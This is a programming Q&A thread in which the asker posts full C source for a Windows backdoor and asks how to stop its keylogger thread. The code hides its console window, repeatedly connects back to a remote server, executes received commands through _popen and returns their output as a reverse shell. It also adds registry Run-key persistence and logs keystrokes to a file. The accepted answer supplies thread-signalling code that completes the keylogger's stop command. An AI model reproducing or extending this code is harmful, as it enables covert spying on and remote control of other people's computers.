# How to close this thread in C?

Tags: c, winapi

Is it possible to  close thread from "keylog_start" else if statement in another else if statement with winapi?

```c
        else if(strncmp("keylog_start", buffer, 12) == 0){
            HANDLE thread = CreateThread(NULL, 0, logg, NULL, 0, NULL);
            goto jump;
        }
        else if(strncmp("keylog_stop", buffer, 11) == 0){

            goto jump;
        }
```

```c
DWORD WINAPI logg(){
    int vkey, last_key_state[0xFF];
    int isCAPSLOCK,isNUMLOCK;
    int isL_SHIFT,isR_SHIFT;
    int isPressed;
    char showKey;
    char NUMCHAR[] = ")!@#$%^&*(";
    char chars_vn[] = ";=,-./`";
    char chars_vs[] = ":+<_>?~";
    char chars_va[] = "[\\]\';";
    char chars_vb[] = "{|}\"";
    FILE *kh;
    char KEY_LOG_FILE[] = "windows.txt";

    for(vkey=0; vkey<0xFF;vkey++){
        last_key_state[vkey] = 0;
    }
    while(1){
        Sleep(10);

        isCAPSLOCK=(GetKeyState(0x14)&0xFF)>0?1:0;
        isNUMLOCK=(GetKeyState(0x90)&0xFF)>0?1:0;
        isL_SHIFT=(GetKeyState(0xA0)&0xFF00)>0?1:0;
        isR_SHIFT=(GetKeyState(0xA1)&0xFF00)>0?1:0;

        for(vkey=0; vkey<0xFF;vkey++){
            isPressed=(GetKeyState(vkey)&0xFF00)>0?1:0;
            showKey=(char)vkey;
            if(isPressed==1 && last_key_state[vkey]==0){
                if(vkey>=0x41 && vkey<=0x5A){
                    if(isCAPSLOCK==0){
                        if(isL_SHIFT==0 && isR_SHIFT==0){
                            showKey=(char)(vkey+0x20);
                        }
                    }
                    else if(isL_SHIFT==1 || isR_SHIFT==1){
                        showKey=(char)(vkey+0x20);
                    }
                }
                else if(vkey>=0x30 && vkey<=0x39){
                    if(isL_SHIFT==1 || isR_SHIFT==1){
                        showKey=NUMCHAR[vkey-0x30];
                    }
                }
                else if(vkey>=0x60 && vkey<=0x69 && isNUMLOCK==1){
                    showKey=(char)(vkey-0x30);
                }
                else if(vkey>=0xBA && vkey<=0xC0){
                    if(isL_SHIFT==1 || isR_SHIFT==1){
                        showKey=chars_vs[vkey-0xBA];
                    }
                    else{
                        showKey=chars_vn[vkey-0xBA];
                    }
                }
                else if(vkey>=0xDB && vkey<=0xDF){
                    if(isL_SHIFT==1 || isR_SHIFT==1){
                        showKey=chars_vb[vkey-0xDB];
                    }
                    else{
                        showKey=chars_va[vkey-0xDB];
                    }
                }
                else if(vkey==0x0D){
                    showKey=(char)0x0A;
                }
                else if(vkey>=0x6A && vkey<=0x6F){
                    showKey=(char)(vkey-0x40);
                }
                else if(vkey!=0x20 && vkey!=0x09){
                    showKey=(char)0x00;
                }
                if(showKey!=(char)0x00){
                    kh=fopen(KEY_LOG_FILE,"a");
                    putc(showKey,kh);
                    fclose(kh);
                }
            }
            last_key_state[vkey]=isPressed;
        }
    }
}
```

```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <winsock2.h>
#include <windows.h>
#include <winuser.h>
#include <wininet.h>
#include <windowsx.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include "keylogger.h"

#define bzero(p, size) (void) memset((p), 0, (size))

int sock;

int bootRun(){
    char err[128] = "Failed\n";
    char suc[128] = "Created Persistence At : HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\n";
    TCHAR szPath[MAX_PATH];
    DWORD pathLen = 0;

    pathLen = GetModuleFileName(NULL, szPath, MAX_PATH);
    if(pathLen == 0){
        send(sock, err, sizeof(err), 0);
        return -1;
    }
    HKEY NewVal;

    if (RegOpenKey(HKEY_CURRENT_USER, TEXT("Software\\Microsoft\\Windows\\CurrentVersion\\Run"), &NewVal) != ERROR_SUCCESS){
        send(sock, err, sizeof(err), 0);
        return -1;
    }
    DWORD pathLenInBytes = pathLen * sizeof(*szPath);
    if(RegSetValueEx(NewVal, TEXT("[XPOSED]Agent"), 0, REG_SZ, (LPBYTE)szPath, pathLenInBytes) != ERROR_SUCCESS){
        RegCloseKey(NewVal);
        send(sock, err, sizeof(err), 0);
        return -1;
    }
    RegCloseKey(NewVal);
    send(sock, suc, sizeof(suc), 0);
    return 0;
}

char *
str_cut(char str[], int slice_from, int slice_to){
    if(str[0] == '\0')
        return NULL;

    char *buffer;
    size_t str_len, buffer_len;

    if(slice_to < 0 && slice_from > slice_to){
        str_len = strlen(str);
        if (abs(slice_to) > str_len -1)
            return NULL;

        if (abs(slice_from) > str_len)
            slice_from = (-1) * str_len;

        buffer_len = slice_to - slice_from;
        str += (str_len + slice_from);

    } else if (slice_from >= 0 && slice_to > slice_from){
        str_len = strlen(str);

        if (slice_from > str_len - 1)
            return NULL;
        buffer_len = slice_to - slice_from;
        str += slice_from;

    } else
        return NULL;

    buffer = calloc(buffer_len, sizeof(char));
    strncpy(buffer, str, buffer_len);
    return buffer;
}

void Shell(){
    char buffer[1024];
    char container[1024];
    char total_response[18384];

    while(1){
        jump:
        bzero(buffer,1024);
        bzero(container,sizeof(container));
        bzero(total_response, sizeof(total_response));
        recv(sock, buffer, 1024, 0);

        if(strncmp("q", buffer, 1) == 0){
            closesocket(sock);
            WSACleanup();
            exit(0);
        }
        else if(strncmp("cd ", buffer, 3) == 0){
            chdir(str_cut(buffer,3,100));
        }
        else if(strncmp("persist", buffer, 7) == 0){
            bootRun();
        }
        else if(strncmp("keylog_start", buffer, 12) == 0){
            HANDLE thread = CreateThread(NULL, 0, logg, NULL, 0, NULL);
            goto jump;
        }
        else if(strncmp("keylog_stop", buffer, 11) == 0){

            goto jump;
        }
        else{
            FILE * fp;
            fp = _popen(buffer, "r");
            while(fgets(container, 1024, fp) != NULL){
                strcat(total_response, container);
            }
            send(sock, total_response, sizeof(total_response), 0);
            fclose(fp);
        }
    }

}

int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrev, LPSTR lpCmdLine, int nCmdShow){
    HWND stealth;
    AllocConsole();
    stealth = FindWindowA("ConsoleWindowClass", NULL);
    ShowWindow(stealth, 0);

    struct sockaddr_in ServAddr;
    unsigned short ServPort;
    char *ServIP;
    WSADATA wsaData;

    ServIP = "";
    ServPort = 50005;

    if(WSAStartup(MAKEWORD(2,0), &wsaData) != 0){
        exit(1);
    }

    sock = socket(AF_INET, SOCK_STREAM, 0); 
    memset(&ServAddr, 0, sizeof(ServAddr));
    ServAddr.sin_family = AF_INET;
    ServAddr.sin_addr.s_addr = inet_addr(ServIP);
    ServAddr.sin_port = htons(ServPort);
    
    start:
    while (connect(sock, (struct sockaddr *) &ServAddr, sizeof(ServAddr)) != 0){
        Sleep(10);
        goto start;
    }
    /*MessageBox(NULL, TEXT("You have been pwned!"), TEXT("[XPOSED]Agent"), MB_OK | MB_ICONERROR); */
    Shell();

}
```

Comment: Can you share the code or the basic structure to your `logg` function so I can give you a hint on how it needs to receive an exit signal.  Presumably it's in some sort of work loop.

Comment: You can forcibly terminate a thread but it's not generally a good idea because you don't know what state it's in (and it doesn't have the chance to clean up). Better to coordinate with the thread and have it terminate itself, by sending it a message or setting an event (or even polling a flag if it's a worker thread that's running all the time).

Comment: code of logg func or of the file with else if statements?

Comment: Both, preferably.

Comment: Side note: Microsoft documentation says to use [`_beginthread()`/`_beginthreadex()`](https://learn.microsoft.com/en-us/cpp/c-runtime-library/reference/beginthread-beginthreadex?view=msvc-170) in C programs, not `CreateThread()`. (Well, unless you avoid using C runtime functions, at least.)

Comment: Please provide a [mcve]. If nothing else it would at least show *some* effort to disguise your intention of writing malware.

Comment: Non profit, for fun.

Answer (score 1, accepted):

Modify your `logg` function as follows. I'm not sure how you aren't getting a warning about your thread function missing a void* parameter.  Perhaps C is more relaxed in the type checking.

```
struct LogOptions
{
    CRITICAL_SECTION cs;
    bool isExitCondition;
};

DWORD WINAPI logg(void* args){

    ...

    LogOptions* pOptions = (LogOptions*)args;

    ...

    while(1){

        bool isExit = false;
        EnterCriticalSection(&pOptions->cs);
        isExit = pOptions->isExitCondition;
        LeaveCriticalSection(&pOptions->cs);

        if (isExit) {
           break;
        }

        Sleep(10);
```

Create your thread like this:

```
LogOptions* pOptions = malloc(sizeof(LogOptions));
pOptions->isExitCondition = false;
InitializeCriticalSection(&pOptions->cs);
HANDLE thread = CreateThread(NULL, 0, logg, pOptions, 0, NULL);
```

When it's time to stop your thread, do this:

```
    // signal the thread to exit by setting the shared variable to true
    EnterCriticalSection(&pOptions->cs);
    pOptions->isExitCondition = true;
    LeaveCriticalSection(&pOptions->cs);

    // wait for thread to exit
    WaitForSingleObject(thread, INFINITE);

    // release resources
    CloseHandle(thread);
    free(pOptions);
```

It's up to you how you will store and pass `thread` and `pOptions` around.

Comment: Two last codes are for backdoor.c right? Also did u mean cs instead of m_cs?

Comment: Oops. Typo on my part. fixed.